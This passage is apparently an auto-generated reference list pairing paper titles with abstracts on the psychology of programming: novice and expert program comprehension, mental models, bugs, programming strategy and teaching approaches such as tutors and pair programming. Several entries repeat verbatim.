Programmer paper_content: Parallel to the growth of computer usage in society is the growth of programming instruction in schools. This informative volume unites a wide range of perspectives on the study of novice programmers that will not only inform readers of empirical findings, but will also provide insights into how novices reason and solve problems within complex domains.
The large variety of methodologies found in these studies helps to improve programming instruction and makes this an invaluable reference for researchers planning studies of their own. Topics discussed include historical perspectives, transfer, learning, bugs, and programming environments. --- paper_title: Acquisition of Programming Knowledge and Skills paper_content: Acquiring and developing knowledge about programming is a highly complex process. This chapter presents a framework for the analysis of programming. It serves as a backdrop for a discussion of findings on learning. Studies in the field and pedagogical work both indicate that the processing dimension involved in programming acquisition is mastered best. The representation dimension related to data structuring and problem modelling is the ‘poor relation’ of programming tasks. This reflects the current emphasis on the computational programming paradigm, linked to dynamic mental models. --- paper_title: Comprehension and recall of miniature programs paper_content: Abstract Differences in the comprehensibility of programming notations can arise because their syntax can make them cognitively unwieldy in a generalized way ( Mayer, 1976 ), because all notations are translated into the same “mental language“ but some are easier to translate than others (Shneiderman & Mayer, 1979 ), or because the mental operations demanded by certain tasks are harder in some notations than in others ( Green, 1977 ). The first two hypotheses predict that the relative comprehensibility of two notations will be consistent across all tasks, whereas the mental operations hypothesis suggests that particular notations may be best suited to particular tasks. The present experiment used four notations and 40 non-programmers to test these hypotheses. Two of the notations were procedural and two were declarative, and one of each pair contained cues to declarative or procedural information, respectively. Different types of comprehension question were used (“sequential“ and “circumstantial“); a mental operations analysis predicted that procedural languages would be “matched” with sequential questions, and declarative languages with circumstantial questions. Questions were answered first from the printed text, and then from recall. Subjects performed best on “matched pairs” of tasks and languages. Perceptually-based cues improved the performance on “unmatched pairs” better than non-perceptual cues when answering from the text, and both types of cues improved performance on “unmatched pairs” in the recall stage. These results support the mental operations explanation. They also show that the mental representation of a program preserves some features of the original notation; a comprehended program is not stored in a uniform “mental language”. --- paper_title: Models and theories of programming strategy paper_content: Abstract Much of the literature concerned with understanding the nature of programming skill has focused explicitly upon the declarative aspects of programmers' knowledge. This literature has sought to describe the nature of stereotypical programming knowledge structures and their organization. However, one major limitation of many of these knowledge-based theories is that they often fail to consider the way in which knowledge is used or applied. Another strand of literature is less well represented. 
This literature deals with the strategic elements of programming skill and is directed towards an analysis of the strategies commonly employed by programmers in the generation and the comprehension of programs. In this paper an attempt is made to unify various analyses of programming strategy. This paper presents a review of the literature in this area, highlighting common themes and concerns, and proposes a model of strategy development which attempts to encompass the central findings of previous research in this area. It is suggested that many studies of programming strategy are descriptive and fail to explain why strategies take the form they do or to explain the typical strategy shifts which are observed during the transitions between different levels of skill. This paper suggests that what is needed is an explanation of programming skill that integrates ideas about knowledge representation with a strategic model, enabling one to make predictions about how changes in knowledge representation might give rise to particular strategies and to the strategy changes associated with developing expertise. This paper concludes by making a number of brief suggestions about the possible nature of this model and its implications for theories of programming expertise. --- paper_title: Variability in program design: the interaction of process with knowledge paper_content: A model of program design is proposed to explain program variability, and is experimentally supported. Variability is shown to be the result of different decisions made by programmers during three stages in the design process. In the first stage, a solution is created based on a particular design approach. In the second stage, actions in the solution are organized by features they share. The actions may then be merged together to define a more concise solution in program code, the third stage of design. Different programs will be created depending on the approach taken to design, the features selected to group actions in a solution, and the features used to merge actions to form program code. Each of the variants observed in the study was traced to the use of a specific piece of information by a programmer at one of the three stages of program design. Many different programs were created as the process of design interacted with the knowledge of the programmer. --- paper_title: Cognitive Psychology and Its Implications paper_content: A fully updated, systematic introduction to the theoretical and experimental foundations of higher mental processes. Avoiding technical jargon, John R. Anderson constructs a coherent picture of human cognition, relating neural functions to mental processes, perception to abstraction, representation to meaning, knowledge to skill, language to thought, and adult cognition to child development. --- paper_title: Strategies of Discourse Comprehension paper_content: rhetorical schemata to be discussed in what follows. Finally, schemata are descriptions, not definitions. The ‘bus’ schema contains information that is nor- --- paper_title: Program Structure and Design paper_content: Abstract Most models of computer programming explain the programmer's behaviour by a single design strategy. This article presents a cognitive architecture that uses cue-based search to model multiple design strategies including procedural, functional, means-end or focal, and opportunistic design. The model has been implemented in an artificial intelligence (AI) system that generates Pascal programs from English specifications.
Knowledge is represented as nodes that reside in internal or external memory, where a node encodes an action that may range from a line of code to a routine in size. A program is built by linking nodes through a search cue of the form . The cue is broadcast to memory, and any matching node is returned; the cue provides a question to ask, and the return provides the answer. A cue on the newly linked node is then selected as a new focus, and the search process repeated. Each design strategy defines a specific node visiting order that traverses the program structure through its links. --- paper_title: Human Cognition and Programming paper_content: Abstract This chapter presents an overview of cognition, and reviews the factors that dictate the nature of cognitive models of programming. The computational metaphor is outlined, and the following issues central to information processing are described: knowledge representation, schemas, production rules, procedural and declarative knowledge, attentional and memory resources, semantic memory, problem solving, skill acquisition, and mental models. These issues are fundamental to psychological models of programming presented in later chapters. --- paper_title: Stimulus structures and mental representations in expert comprehension of computer programs paper_content: Abstract Comprehension of computer programs involves detecting or inferring different kinds of relations between program parts. Different kinds of programming knowledge facilitate detection and representation of the different textual relations. The present research investigates the role of programming knowledge in program comprehension and the nature of mental representations of programs; specifically, whether procedural (control flow) or functional (goal hierarchy) relations dominate programmers' mental representations of programs. In the first study, 80 professional programmers were tested on comprehension and recognition of short computer program texts. The results suggest that procedural rather than functional units form the basis of expert programmers' mental representations, supporting work in other areas of text comprehension showing the importance of text structure knowledge in understanding. In a second study 40 professional programmers studied and modified programs of moderate length. Results support conclusions from the first study that programs are first understood in terms of their procedural episodes. However, results also suggest that a programmer's task goals may influence the relations that dominate mental representations later in comprehension. --- paper_title: Syntactic/semantic interactions in programmer behavior: A model and experimental results paper_content: This paper presents a cognitive framework for describing behaviors involved in program composition, comprehension, debugging, modification, and the acquisition of new programming concepts, skills, and knowledge. An information processing model is presented which includes a long-term store of semantic and syntactic knowledge, and a working memory in which problem solutions are constructed. New experimental evidence is presented to support the model of syntactic/semantic interaction. --- paper_title: Mental Representations Constructed by Experts and Novices in Object-Oriented Program Comprehension paper_content: Previous studies on program comprehension were carried out largely in the context of procedural languages. 
Our purpose is to develop and evaluate a cognitive model of object-oriented (OO) program understanding. Our model is based on van Dijk and Kintsch's model of text understanding (1983). One key aspect of this theoretical approach is the distinction between two kinds of representation the reader might construct from a text: the textbase and the situation model. On the basis of results of an experiment we have conducted, we evaluate the cognitive validity of this distinction in OO program understanding. We examine how the construction of these two representations is differentially affected by the programmer's expertise and how they evolve differentially over time. --- paper_title: Cognitive processes in program comprehension paper_content: Abstract This paper reports on an empirical study of the cognitive processes involved in program comprehension. Verbal protocols were gathered from professional programmers as they were engaged in a program-understanding task. Based on analysis of these protocols, several types of interesting cognitive events were identified. These include asking questions and conjecturing facts about the code. We describe these event types and use them to derive a computational model of the programmers' mental processes. --- paper_title: Cognitive Psychology and Its Implications paper_content: A fully updated, systematic introduction to the theoretical and experimental foundations of higher mental processes. Avoiding technical jargon, John R. Anderson constructs a coherent picture of human cognition, relating neural functions to mental processes, perception to abstraction, representation to meaning, knowledge to skill, language to thought, and adult cognition to child development. --- paper_title: Studying the Novice Programmer paper_content: Parallel to the growth of computer usage in society is the growth of programming instruction in schools. This informative volume unites a wide range of perspectives on the study of novice programmers that will not only inform readers of empirical findings, but will also provide insights into how novices reason and solve problems within complex domains. The large variety of methodologies found in these studies helps to improve programming instruction and makes this an invaluable reference for researchers planning studies of their own. Topics discussed include historical perspectives, transfer, learning, bugs, and programming environments. --- paper_title: Acquisition of Programming Knowledge and Skills paper_content: Acquiring and developing knowledge about programming is a highly complex process. This chapter presents a framework for the analysis of programming. It serves as a backdrop for a discussion of findings on learning. Studies in the field and pedagogical work both indicate that the processing dimension involved in programming acquisition is mastered best. The representation dimension related to data structuring and problem modelling is the ‘poor relation’ of programming tasks. This reflects the current emphasis on the computational programming paradigm, linked to dynamic mental models. --- paper_title: More or less following a plan during design: opportunistic deviations in specification paper_content: An observational study was conducted on a mechanical engineer throughout his task of defining the functional specifications for the machining operations of a factory automation cell. The engineer described his activity as following a hierarchically structured plan. The actual activity is in fact opportunistically organized.
The engineer follows his plan as long as it is cognitively cost-effective. As soon as other actions are more interesting, he abandons his plan to proceed to these actions. This paper analyses when and how these alternative-to-the-plan actions come up. Quantitative results are presented with regard to the degree of plan deviation, the design components and the definitional aspects which are most affected by these deviations, and the deviation patterns. Qualitative results concern their nature. An explanatory framework for plan deviation is proposed in the context of a blackboard model. Plan deviation is supposed to occur if the control, according to certain selection criteria, selects an alternative-to-the-planned-action proposal rather than the planned action proposal. Implications of these results for assistance tools are discussed briefly. --- paper_title: Language Semantics, Mental Models and Analogy paper_content: Abstract The semantics of a number of programming languages is related to the operation of a computer device. Learning a programming language is considered here from the point of view of learning the operating rules of the processing device that underlies the language, as a complement to the learning of new notations, or a new means of expression to be compared to natural language. This acquisition leads beginners to elaborate a new representation and processing system (RPS) by analogy with other systems that are associated to well-known devices. During acquisition, beginners not only learn new basic operations but also the constraints of these operations upon program structures. Learning therefore concerns a basic problem space as well as abstract problem spaces within which planning takes place. The links between this approach to learning to program and a number of related works on learning to use software are underlined. Implications of these research findings in the programmer training are drawn. --- paper_title: Models and theories of programming strategy paper_content: Abstract Much of the literature concerned with understanding the nature of programming skill has focused explicitly upon the declarative aspects of programmers' knowledge. This literature has sought to describe the nature of stereotypical programming knowledge structures and their organization. However, one major limitation of many of these knowledge-based theories is that they often fail to consider the way in which knowledge is used or applied. Another strand of literature is less well represented. This literature deals with the strategic elements of programming skill and is directed towards an analysis of the strategies commonly employed by programmers in the generation and the comprehension of programs. In this paper an attempt is made to unify various analyses of programming strategy. This paper presents a review of the literature in this area, highlighting common themes and concerns, and proposes a model of strategy development which attempts to encompass the central findings of previous research in this area. It is suggested that many studies of programming strategy are descriptive and fail to explain why strategies take the form they do or to explain the typical strategy shifts which are observed during the transitions between different levels of skill. 
This paper suggests that what is needed is an explanation of programming skill that integrates ideas about knowledge representation with a strategic model, enabling one to make predictions about how changes in knowledge representation might give rise to particular strategies and to the strategy changes associated with developing expertise. This paper concludes by making a number of brief suggestions about the possible nature of this model and its implications for theories of programming expertise. --- paper_title: What do novices learn during program comprehension paper_content: Comprehension of computer programs involves identifying important program parts and inferring relationships between them. The ability to comprehend a computer program is a skill that begins its development in the novice programmer and reaches maturity in the expert programmer. This research examined the beginning of this process, that of comprehension of computer programs by novice programmers. The mental representations of the program text that novices form, which indicate the comprehension strategies being used, were examined. In the first study, 80 novice programmers were tested on their comprehension of short program segments. The results suggested that novices form detailed, concrete mental representations of the program text, supporting work that has previously been done with novice comprehension. Their mental representations were primarily procedural in nature, with little or no modeling using real‐world referents. In a second study, the upper and lower quartile comprehenders from Study 1 were test... --- paper_title: Mental models and computer programming paper_content: Programming is a cognitive activity that requires the learning of new reasoning skills and the understanding of new technical information. Since novices lack domain-specific knowledge, many instructional techniques attempt to provide them with a framework or mental model that can be used for incorporating new information. A major research question concerns how to encourage the acquisition of good mental models and how these models influence the learning process. One possible technique for providing an effective mental model is to use dynamic cues that make transparent to the user all the changes in the variable values, source codes, output, etc., as the program runs. Two groups of novice programmers were used in the experiment. All subjects learned some programming notions in the C language (MIXC). The MIXC version of the programming language provides a debugging facility (C trace) designed to show through a system window all the program components. Subjects were either allowed to use this facility or not allowed to do so. Performance measures of programming and debugging were taken as well as measures directed to assess subjects' mental models. Results showed differences in the way in which the two groups represented and organized programming concepts, although the performance tasks did not show parallel effects. --- paper_title: The Tasks of Programming paper_content: Abstract Computer programming and other design tasks have often been characterized as a set of non-interacting subtasks. In principle, it may be possible to separate these subtasks, but in practice there are substantial interactions between them. 
We argue that this is a fundamental feature of programming deriving from the cognitive characteristics of the subtasks, the high uncertainty in programming environments, and the social nature of the environments in which complex software development takes place. --- paper_title: Program Structure and Design paper_content: Abstract Most models of computer programming explain the programmer's behaviour by a single design strategy. This article presents a cognitive architecture that uses cue-based search to model multiple design strategies including procedural, functional, means-end or focal, and opportunistic design. The model has been implemented in an artificial intelligence (AI) system that generates Pascal programs from English specifications. Knowledge is represented as nodes that reside in internal or external memory, where a node encodes an action that may range from a line of code to a routine in size. A program is built by linking nodes through a search cue of the form . The cue is broadcast to memory, and any matching node is returned; the cue provides a question to ask, and the return provides the answer. A cue on the newly linked node is then selected as a new focus, and the search process repeated. Each design strategy defines a specific node visiting order that traverses the program structure through its links. --- paper_title: Characteristics of the mental representations of novice and expert programmers: an empirical study paper_content: Abstract This paper presents five abstract characteristics of the mental representation of computer programs: hierarchical structure, explicit mapping of code to goals, foundation on recognition of recurring patterns, connection of knowledge, and grounding in the program text. An experiment is reported in which expert and novice programmers studied a Pascal program for comprehension and then answered a series of questions about it, designed to show these characteristics if they existed in the mental representations formed. Evidence for all of the abstract characteristics was found in the mental representations of expert programmers. Novices' representations generally lacked the characteristics, but there was evidence that they had the beginnings, although poorly developed, of such characteristics. --- paper_title: Conditions of Learning in Novice Programmers paper_content: Under normal instructional circumstances, some youngsters learn programming in BASIC or LOGO much better than others. Clinical investigations of novice programmers suggest that this happens in part... --- paper_title: Programming Languages in Education: The Search for an Easy Start paper_content: (i) We first discuss educational objectives in teaching programming, using Logo research as a vehicle to report on versions of the ‘transfer of competence’ hypothesis. This hypothesis has received limited support in a detailed sense, but not in its original more grandiose conception of programming as a ‘mental gymnasium’. (ii) Difficulties in learning quickly abnegate educational objectives, so we next turn to Prolog, which originally promised to be easy to learn since it reduces the amount of program control that the programmer needs to define, but which turned out to be very prone to serious misconceptions. Recent work suggests that Prolog difficulties may be caused by an inability to see the program working. (iii) Does the remedy therefore lie in starting learners on programmable devices that are low level, concrete and highly visible? 
Research on this line has brought out another problem: learners find the ‘programming plans’ hard to master. (iv) Finally, we sketch a project designed to teach standard procedural programming via ‘natural plans’. Our conclusions stress pragmatic approaches with much attention to ease of use, avoiding taking ‘economy’ and ‘elegance’ as virtues in their own right. --- paper_title: A goal/plan analysis of buggy pascal programs paper_content: In this paper, we present a descriptive theory of buggy novice programs and a bug categorization scheme that is based on this theory. Central to this theory is the cognitively plausible knowledge--goals and plans--that underlies programming. The bug categorization scheme makes explicit problem-dependent goal and plan knowledge at many different levels of detail. We provide several examples of how the scheme permits us to focus on bugs in a way that facilitates generating plausible accounts of why the bugs may have arisen. In particular, our approach has led us to one explanation of why some novice programs are buggier than others. A basic part of this explanation is the notion of merged goals and merged plans in which a single integrated plan is used to achieve multiple goals. --- paper_title: Pedagogical Changes in the Delivery of the First-Course in Computer Science: Problem Solving, Then Programming paper_content: A teaching reform initiative, started in the spring semester of 1993 at the New Jersey Institute of Technology (NJIT), is described. The program seeks to increase student success in a freshman computer science course, and ultimately in the entire NJIT curriculum. The traditional teaching methods where the teacher presided over a lecture session supplying facts and figures, providing ideas, and presenting problems and their solutions, has been altered. The new learning environment described in this paper aims to create an all-inclusive setting inviting the students to make the transformation from passive learners to active participants. Rather than merely listening to lectures, students formulate problems and devise their own approaches to answering questions and finding solutions. Such a teaching/learning methodology requires instructional redesign and role redefinition. The presentation of class material is reordered as the teacher and students cross each other's confines becoming a more cohesive entity. --- paper_title: Acquisition of Programming Knowledge and Skills paper_content: Acquiring and developing knowledge about programming is a highly complex process. This chapter presents a framework for the analysis of programming. It serves as a backdrop for a discussion of findings on learning. Studies in the field and pedagogical work both indicate that the processing dimension involved in programming acquisition is mastered best. The representation dimension related to data structuring and problem modelling is the ‘poor relation’ of programming tasks. This reflects the current emphasis on the computational programming paradigm, linked to dynamic mental models. --- paper_title: Models and theories of programming strategy paper_content: Abstract Much of the literature concerned with understanding the nature of programming skill has focused explicitly upon the declarative aspects of programmers' knowledge. This literature has sought to describe the nature of stereotypical programming knowledge structures and their organization. 
However, one major limitation of many of these knowledge-based theories is that they often fail to consider the way in which knowledge is used or applied. Another strand of literature is less well represented. This literature deals with the strategic elements of programming skill and is directed towards an analysis of the strategies commonly employed by programmers in the generation and the comprehension of programs. In this paper an attempt is made to unify various analyses of programming strategy. This paper presents a review of the literature in this area, highlighting common themes and concerns, and proposes a model of strategy development which attempts to encompass the central findings of previous research in this area. It is suggested that many studies of programming strategy are descriptive and fail to explain why strategies take the form they do or to explain the typical strategy shifts which are observed during the transitions between different levels of skill. This paper suggests that what is needed is an explanation of programming skill that integrates ideas about knowledge representation with a strategic model, enabling one to make predictions about how changes in knowledge representation might give rise to particular strategies and to the strategy changes associated with developing expertise. This paper concludes by making a number of brief suggestions about the possible nature of this model and its implications for theories of programming expertise. --- paper_title: Expert Programming Knowledge: A Strategic Approach paper_content: This chapter considers an alternative to the ‘programming plan’ view of programming expertise, namely that expert programmers have a much wider repertoire of strategies available to them as they program than do novices. This analysis does not dispute that experts have ‘plan-like’ knowledge, but questions the importance of the knowledge itself versus an understanding of when or how to use that knowledge. This chapter will firstly examine evidence which challenges the completeness of the plan-based theory and then it will look at evidence which reveals explicit strategic differences. As the studies are presented a list of strategies available to experts will be maintained. Although the emphasis of this section of the book is on expert performance, the chapter concludes with a brief look at studies of novices, since the strategic approach includes the assumption that the strategies used by novices are different from those available to experts. From all these studies it will be seen that experts choose strategies in response to factors such as unfamiliar situations, differing task characteristics and different language requirements, whilst many problems for novice programmers stem not only from lack of knowledge, but also from the lack of an adequate strategy for coping with the programming problem. ::: ::: The previous chapter has presented studies of expertise in computer programming that have concentrated on the content and structure of expert knowledge. The dominant concept has been the ‘programming plan’, which has been proposed as the experts' mental representation of programming knowledge, and which has been used in the development of programming tutors and environments for novice programmers. ::: ::: This chapter examines those aspects of expertise that are not easily explained by plan-based theories. 
It is intended that the strategic approach described in this chapter should be seen as a complementary, rather than alternative, explanation of expertise. As the various studies are described a list of important strategies which programmers may use will be developed. The studies that are to be presented reveal problems with two implications of the plan-based approach: (1) that ‘programming plans’ provide a complete explanation of expert programming behaviour; and (2) that a novice can be defined as someone who does not possess this expert knowledge. An important, but often implicit assumption of the plan-based theorists is that the cognitive processes underlying programming are relatively straightforward. Often based on ideas from artificial intelligence, these processes are taken to be general problem-solving skills (cf. SOAR, Laird et al., 1987; ACT*, Anderson, 1983), which a novice programmer also possesses. The learning of computer programming is the acquisition of the appropriate knowledge structures for the problem-solving skills to use. These knowledge structures may then be labelled ‘plans’ (see Chapter 3.1 for more details), though other possibilities exist. The critical feature is that expertise is seen as the acquisition of knowledge. The alternative position is that expertise in programming may involve a variety of cognitive processes which, coupled with changes in knowledge, can give rise to a choice of different methods for solving any particular programming problem. These different methods can be termed strategies. The critical feature of the strategy argument is that observations of novice-expert differences can be caused by either knowledge differences, processing differences, or both. Any assessment of this argument has two important strands. Firstly some evidence questioning the plan-based theory will be presented (evidence for the theory has been covered by the previous chapter) and then evidence of strategic differences will be described. For these reasons it is important that the evidence for alternative aspects to expertise beyond the plan-based theories is carefully considered. --- paper_title: Preprogramming knowledge: a major source of misconceptions in novice programmers paper_content: We present a process model to explain bugs produced by novices early in a programming course. The model was motivated by interviews with novice programmers solving simple programming problems. Our key idea is that many programming bugs can be explained by novices inappropriately using their knowledge of step-by-step procedural specifications in natural language. We view programming bugs as patches generated in response to an impasse reached by the novice while developing a program. We call such patching strategies bug generators. Several of our bug generators describe how natural language preprogramming knowledge is used by novices to create patches. Other kinds of bug generators are also discussed. We describe a representation both for novice natural language preprogramming knowledge and novice fragmentary programming knowledge. Using these representations and the bug generators, we evaluate the model by analyzing four interviews with novice programmers. --- paper_title: Learning flow of control: recursive and iterative procedures paper_content: Two experiments were performed to study students' ability to write recursive and iterative programs and transfer between these two skills.
Subjects wrote functions to accumulate instances into a list. Problems varied in terms of whether they were recursive or iterative, whether they operated on lists or numbers, whether they accumulated results in forward or backward manner, whether they accumulated on success or failure, and whether they simply skipped or ejected on failure to accumulate. Subjects had real difficulty only with the dimensions concerned with flow of control, namely, recursive versus iterative, and skip versus eject. We found positive transfer from writing iterative functions to writing recursive functions, but not vice versa. A subsequent protocol study revealed subjects had such a poor mental model of recursion that they developed poor learning strategies which hindered their understanding of iteration. It is argued that having an adequate model of the functionality of programming is prerequisite to learning to program, and that it is sensible pedagogical practice to base understanding of recursive flow of control on understanding iterative flow of control. --- paper_title: Programming pedagogy—a psychological overview paper_content: Can we turn novices into experts in a four year undergraduate program? If so, how? If not, what is the best we can do? While every teacher has his/her own opinion on these questions, psychological studies over the last twenty years have started to furnish scientific answers. Unfortunately, little of these results have been incorporated into curricula or textbooks. This report is a brief overview of some of the more important results concerning computer programming and how they can affect course design. --- paper_title: Fragile knowledge and neglected strategies in novice programmers paper_content: Many students have great difficulty mastering the basics of programming. Inadequate knowledge, neglect of general problem-solving strategies, or both might explain their troubles. We report a series of clinical interviews of students taking first year BASIC in which an experimenter interacted with students as they worked, systematically providing help as needed in a progression from general strategic prompts to particular advice. The results indicate a substantial problem of "fragile knowledge" in novices: knowledge that is partial, hard to access, and often misused. The results also show that general strategic prompts often resolve these difficulties. Recommendations for teaching more robust knowledge and general strategies are made. Implications for the impact of programming on general cognitive skills are considered. --- paper_title: A Study of the Development of Programming Ability and Thinking Skills in High School Students paper_content: This article reports on a year-long study of high school students learning computer programming. The study examined three issues: 1) what is the impact of programming on particular mathematical and reasoning abilities?; 2) what cognitive skills or abilities best predict programming ability?; and 3) what do students actually understand about programming after two years of high school study? The results showed that even after two years of study, many students had only a rudimentary understanding of programming. Consequently, it was not surprising to also find that programming experience (as opposed to expertise) does not appear to transfer to other domains which share analogous formal properties.
The article concludes that we need to more closely study the pedagogy of programming and how expertise can be better attained before we prematurely go looking for significant and wide reaching transfer effects from programming. --- paper_title: Program Structure and Design paper_content: Abstract Most models of computer programming explain the programmer's behaviour by a single design strategy. This article presents a cognitive architecture that uses cue-based search to model multiple design strategies including procedural, functional, means-end or focal, and opportunistic design. The model has been implemented in an artificial intelligence (AI) system that generates Pascal programs from English specifications. Knowledge is represented as nodes that reside in internal or external memory, where a node encodes an action that may range from a line of code to a routine in size. A program is built by linking nodes through a search cue of the form . The cue is broadcast to memory, and any matching node is returned; the cue provides a question to ask, and the return provides the answer. A cue on the newly linked node is then selected as a new focus, and the search process repeated. Each design strategy defines a specific node visiting order that traverses the program structure through its links. --- paper_title: Conditions of Learning in Novice Programmers paper_content: Under normal instructional circumstances, some youngsters learn programming in BASIC or LOGO much better than others. Clinical investigations of novice programmers suggest that this happens in part... --- paper_title: What do novice programmers know about recursion paper_content: Recent research into differences between novice and expert computer programmers has provided evidence that experts know more than novices, and what they know is better organized. The conclusion is only as interesting as it is intuitive. This paper reports an experiment which was designed to determine precisely what novice programmers understand about the behaviour of recursive procedures, and exactly how their understanding differs from an expert's understanding of the process. The results show that different novices understand, or misunderstand, different things. Implications of the findings are discussed with respect to other research into novice and expert programming performance. --- paper_title: Studying the Novice Programmer paper_content: Parallel to the growth of computer usage in society is the growth of programming instruction in schools. This informative volume unites a wide range of perspectives on the study of novice programmers that will not only inform readers of empirical findings, but will also provide insights into how novices reason and solve problems within complex domains. The large variety of methodologies found in these studies helps to improve programming instruction and makes this an invaluable reference for researchers planning studies of their own. Topics discussed include historical perspectives, transfer, learning, bugs, and programming environments. --- paper_title: Cognitive style, personality, and computer programming paper_content: Abstract Within the field of computer programming there is evidence of tremendous variation among individuals' achievement in programming. Cognitive styles and personality traits have been investigated as factors that may help explain some of that variability; however, they have failed to consistently explain individual differences in achievement.
In the majority of these studies, computer programming has been measured as a single activity. Computer programming has been described as an activity having separate and distinct phases: problem representation, program design, coding, and debugging. It may be that certain cognitive styles and personality dimensions affect some phases but not others. The purpose of this review is twofold. First, the empirical studies on the relation between cognitive style, personality traits and computer programming are reviewed. Second, the paper provides an agenda for future research by providing a conceptual framework that organizes and relates the variety of constructs to the specific phases of writing computer programs and identifies a number of distinct gaps in this particular body of research. --- paper_title: Conditions of Learning in Novice Programmers paper_content: Under normal instructional circumstances, some youngsters learn programming in BASIC or LOGO much better than others. Clinical investigations of novice programmers suggest that this happens in part... --- paper_title: A Study of the Development of Programming Ability and Thinking Skills in High School Students paper_content: This article reports on a year-long study of high school students learning computer programming. The study examined three issues: 1) what is the impact of programming on particular mathematical and reasoning abilities?; 2) what cognitive skills or abilities best predict programming ability?; and 3) what do students actually understand about programming after two years of high school study? The results showed that even after two years of study, many students had only a rudimentary understanding of programming. Consequently, it was not surprising to also find that programming experience (as opposed to expertise) does not appear to transfer to other domains which share analogous formal properties. The article concludes that we need to more closely study the pedagogy of programming and how expertise can be better attained before we prematurely go looking for significant and wide reaching transfer effects from programming. --- paper_title: Language Semantics, Mental Models and Analogy paper_content: Abstract The semantics of a number of programming languages is related to the operation of a computer device. Learning a programming language is considered here from the point of view of learning the operating rules of the processing device that underlies the language, as a complement to the learning of new notations, or a new means of expression to be compared to natural language. This acquisition leads beginners to elaborate a new representation and processing system (RPS) by analogy with other systems that are associated to well-known devices. During acquisition, beginners not only learn new basic operations but also the constraints of these operations upon program structures. Learning therefore concerns a basic problem space as well as abstract problem spaces within which planning takes place. The links between this approach to learning to program and a number of related works on learning to use software are underlined. Implications of these research findings in the programmer training are drawn. --- paper_title: Cognitive Principles in the Design of Computer Tutors.
paper_content: Abstract : A set of principles is derived from the ACT theory of cognition for designing intelligent tutors: identify the goal structure of the problem space, provide instruction on the problem-solving context, provide immediate feedback on errors, minimize working memory loads, use production system models of the student, adjust the grain size of instruction according to learning principles, enable the student to approach the target skills by successive approximation, and promote use of general problem-solving rules over analogy. These principles have successfully guided our design of tutors for college students learning to program LISP and for high school students learning geometry. --- paper_title: A Study of the Development of Programming Ability and Thinking Skills in High School Students paper_content: This article reports on a year-long study of high school students learning computer programming. The study examined three issues: 1) what is the impact of programming on particular mathematical and reasoning abilities?; 2) what cognitive skills or abilities best predict programming ability?; and 3) what do students actually understand about programming after two years of high school study? The results showed that even after two years of study, many students had only a rudimentary understanding of programming. Consequently, it was not surprising to also find that programming experience (as opposed to expertise) does not appear to transfer to other domains which share analogous formal properties. The article concludes that we need to more closely study the pedagogy of programming and how expertise can be better attained before we prematurely go looking for significant and wide reaching transfer effects from programming. --- paper_title: Skill Acquisition and the LISP Tutor paper_content: An analysis of student learning with the LISP tutor indicates that while LISP is complex, learning it is simple. The key to factoring out the complexity of LISP is to monitor the learning of the 500 productions in the LISP tutor which describe the programming skill. The learning of these productions follows the power-law learning curve typical of skill acquisition. There is transfer from other programming experience to the extent that this programming experience involves the same productions. Subjects appear to differ only on the general dimensions of how well they acquire the productions and how well they retain the productions. Instructional manipulations such as remediation, content of feedback, and timing of feedback are effective to the extent they give students more practice programming, and explain to students why correct solutions work. --- paper_title: Cognitive modeling and intelligent tutoring paper_content: Abstract : The ACT theory of skill acquisition and its PUPS successor provide production-system models of the acquisition of skills such as LISP programming, geometry theorem-proving, and solving of algebraic equations. Knowledge begins in declarative form and is used by analogical processes to solve specific problems. Domain specific productions are compiled from the traces of these problem solutions. The model-tracing methodology has been developed as a means of displaying this cognitive theory in intelligent tutoring. Implementation of the model-tracing methodology involves developing a student model, a pedagogical module, and an interface. Issues associated with the development of each of these components are discussed.
Work on tutoring and work on skill acquisition have proven to be symbiotic; that is, each has furthered the other's development. Keywords: Analogy; Artificial Intelligence; Cognitive Science; Computer-Assisted Instruction. --- paper_title: Studying the Use of Peer Learning in the Introductory Computer Science Curriculum paper_content: This paper reports the results of studying the use of peer learning in the introductory computer science curriculum. The project involves educators from a variety of institutions who participated in two summer workshops and either introduced or continued their use of peer learning at their institutions as part of this project. The results of the collective work include much experience with different types of peer learning in different settings. Overall, the results indicate that peer learning is a valuable technique that should be used as one pedagogical approach in teaching the introductory computer science curriculum. --- paper_title: In Support of Pair Programming in the Introductory Computer Science Course paper_content: A formal pair programming experiment was run at North Carolina to empirically assess the educational efficacy of the technique in a CS1 course. Results indicate that students who practice pair programming perform better on programming projects and are more likely to succeed by completing the class with a C or better. Student pairs are more self-sufficient, which reduces their reliance on the teaching staff. Qualitatively, paired students demonstrate higher order thinking skills than students who work alone. These results are supportive of pair programming as a collaborative learning technique. --- paper_title: Incorporating problem-solving patterns in CS1 paper_content: In [Wall96], Wallingford describes an approach to introductory courses that is based on programming patterns, i.e., algorithms or problem-solving approaches that can be applied to various applications. By focusing on patterns such as "Input-Process-Test" or "Process all items in a collection", students reason at a higher level of abstraction when solving problems. In addition, code schema can be provided which apply to certain patterns, and these schema then serve as frameworks for program development. (See also [Rist89], [Coad92], and [GHJV95].) Closely related to the patterns approach is the use of themes in a programming course. Selecting a particular idea (such as self-reference [Astr94]), methodology (such as formal specifications [MH96]), or application domain (such as databases [AR95]) provides a framework for learning new techniques and concepts. Once a concept has been studied in one context, new applications which similarly utilize that concept can be understood more easily. This paper describes the use of a particular problem-solving pattern, binary reduction, as a recurring theme in the CS1 course. Other problem-solving approaches, such as divide-and-conquer or generate-and-test, could similarly be used. By introducing problem-solving patterns early in the course and then revisiting them in different contexts, students learn to look for common characteristics in problems, and to use an existing solution as a framework for solving related problems. Perhaps more importantly, understanding the behavior of one problem solution can simplify the analysis of other problem solutions based on the same pattern.
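To make the "binary reduction" pattern mentioned in the preceding abstract concrete, the following is a minimal sketch; it is not taken from the cited CS1 paper, and the function name and example data are illustrative only. It shows the pattern in its most familiar form, binary search over a sorted sequence, where each step discards half of the remaining candidates.

```python
def binary_search(items, target):
    """Binary reduction: repeatedly halve the search interval of a sorted list.

    Returns the index of target in items, or -1 if target is absent.
    """
    lo, hi = 0, len(items) - 1
    while lo <= hi:
        mid = (lo + hi) // 2      # split the current interval in half
        if items[mid] == target:
            return mid            # found: stop reducing
        elif items[mid] < target:
            lo = mid + 1          # target can only lie in the upper half
        else:
            hi = mid - 1          # target can only lie in the lower half
    return -1                     # interval is empty: target not present


if __name__ == "__main__":
    print(binary_search([2, 3, 5, 7, 11, 13], 7))   # prints 3
    print(binary_search([2, 3, 5, 7, 11, 13], 4))   # prints -1
```

The same halving idea underlies merge sort and bisection root finding, which is what makes it a reusable teaching pattern rather than a one-off trick.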
